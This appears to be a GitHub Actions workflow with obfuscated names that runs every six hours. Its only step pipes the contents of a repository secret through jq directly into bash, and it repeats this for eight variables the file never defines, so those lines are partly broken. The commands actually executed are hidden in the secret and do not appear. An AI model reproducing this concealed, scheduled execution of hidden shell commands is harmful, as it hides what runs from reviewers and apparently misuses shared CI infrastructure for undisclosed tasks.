name: lixiangyang3456
on:
  workflow_dispatch:
  schedule:
    - cron: '17 1/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lixiangyang3456
        env:
          mk890: ${{ secrets.mk890 }}
        run: |
          echo $mk890 | jq -r .s71 | /bin/bash
          echo $pvanf97643 | jq -r .a810 | /bin/bash
          echo $pyxla4847 | jq -r .docas64156 | /bin/bash
          echo $st43429 | jq -r .lrrv87 | /bin/bash
          echo $umyap741 | jq -r .qee168 | /bin/bash
          echo $ih22 | jq -r .ec9184 | /bin/bash
          echo $cz0 | jq -r .yoihx75 | /bin/bash
          echo $k69 | jq -r .inia99 | /bin/bash
          echo $mbr3 | jq -r .zj8 | /bin/bash

